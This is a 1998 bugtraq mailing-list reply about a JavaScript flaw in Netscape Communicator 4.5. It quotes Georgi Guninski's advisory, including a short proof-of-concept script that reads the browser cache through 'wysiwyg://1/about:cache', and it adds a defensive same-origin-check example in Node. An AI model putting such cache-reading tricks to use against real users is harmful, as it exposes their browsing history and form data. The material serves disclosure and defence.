[8351] in bugtraq
Re: Javascript bug in Netscape Communicator 4.5
daemon@ATHENA.MIT.EDU (Ian Guthrie)
Fri Oct 30 16:34:40 1998
Date: Wed, 28 Oct 1998 18:33:40 -0600
Reply-To: iguthrie@swbell.net
From: Ian Guthrie <iguthrie@SWBELL.NET>
X-To: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
FYI: I run Netscape 4.04 and this is what I got trying that link:
JavaScript Error: file:/c|/, line 2:
access disallowed from scripts at
http://www.geocities.com/ResearchTriangle/1711/b5.html to documents at
another domain.
Ian
Georgi Guninski wrote:
> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading the user's cache (the URLs the user
> has visited, including the info in GET forms). Reading local directory
> contents is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
>
> Demonstration is available at:
> Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
> Directory reading:
> http://www.geocities.com/ResearchTriangle/1711/b5.html
>
> The javascript code is:
>
> sl=window.open('wysiwyg://1/about:cache');
> //For Netscape 3.04 remove 'wysiwyg://1/'
> sl2=sl.window.open();
> sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here
> are some links from your cache:\"; for(i=0;i<5;i++)
> x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
> sl2.location.reload();
>
> Workaround: Disable Javascript.
>
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
>
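The error Ian's Netscape 4.04 printed is the browser's same-origin check refusing a script served from geocities.com access to a `file:` document. As an added example, not code from either post, the following JavaScript (runs under Node, using the built-in WHATWG `URL` class) implements that check for the URLs that appear in this thread and for the opaque-origin cases (`file:`, `about:`, `javascript:`) that modern browsers treat as never matching any other origin. The Netscape 4 rule itself is not documented on this page, so the modern (scheme, host, port) rule is assumed; the names `originOf`, `sameOrigin`, `checkAccess` and `demo` are this example's own.

```javascript
// Added example: a minimal same-origin check of the kind whose refusal Ian's
// Netscape 4.04 run printed. Not code from the bugtraq posts; function names
// (originOf, sameOrigin, checkAccess, demo) are this example's own.
// Origin = (scheme, host, port) for http/https. file:, about:, javascript: and
// unparseable URLs get an opaque origin that never equals any other origin,
// which is the rule modern browsers apply (assumed here for Netscape 4).

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

function originOf(urlString) {
  let u;
  try {
    u = new URL(urlString);          // WHATWG parser, built into Node and browsers
  } catch (e) {
    return null;                     // unparseable: opaque origin
  }
  if (u.protocol === "http:" || u.protocol === "https:") {
    const port = u.port || DEFAULT_PORTS[u.protocol];
    return `${u.protocol}//${u.hostname.toLowerCase()}:${port}`;
  }
  return null;                       // file:, about:, javascript:, ...: opaque
}

function sameOrigin(scriptUrl, targetUrl) {
  const a = originOf(scriptUrl);
  const b = originOf(targetUrl);
  // Two opaque origins are never the same, even if the URLs are identical.
  return a !== null && b !== null && a === b;
}

function checkAccess(scriptUrl, targetUrl) {
  if (sameOrigin(scriptUrl, targetUrl)) {
    return { allowed: true, reason: "same origin" };
  }
  return {
    allowed: false,
    reason: `access disallowed from scripts at ${scriptUrl} ` +
            `to documents at another domain.`,
  };
}

// Constructed pairs: the geocities pages from the thread against the
// documents the demonstration opens, plus two same-host controls.
const SAMPLE_CASES = [
  ["http://www.geocities.com/ResearchTriangle/1711/b5.html", "file:/c|/"],
  ["http://www.geocities.com/ResearchTriangle/1711/b4.html", "about:cache"],
  ["http://www.geocities.com/ResearchTriangle/1711/b4.html",
   "http://www.geocities.com:80/ResearchTriangle/1711/"],
  ["http://www.geocities.com/ResearchTriangle/1711/b4.html",
   "https://www.geocities.com/ResearchTriangle/1711/"],
];

function demo() {
  return SAMPLE_CASES.map(([from, to]) => ({ from, to, ...checkAccess(from, to) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of demo()) {
    console.log(`${r.allowed ? "ALLOW" : "DENY "} ${r.from} -> ${r.to}`);
  }
}
```

Run it with `node sop-check.js`: only the third pair (same scheme, host and default port) is allowed; the `file:` and `about:` targets are denied because their origin is opaque, and the `https:` target is denied because the scheme differs. The design point is that an opaque origin is never equal to anything, not even to itself, so a local directory listing or cache page can never be read by a script from the network under this rule.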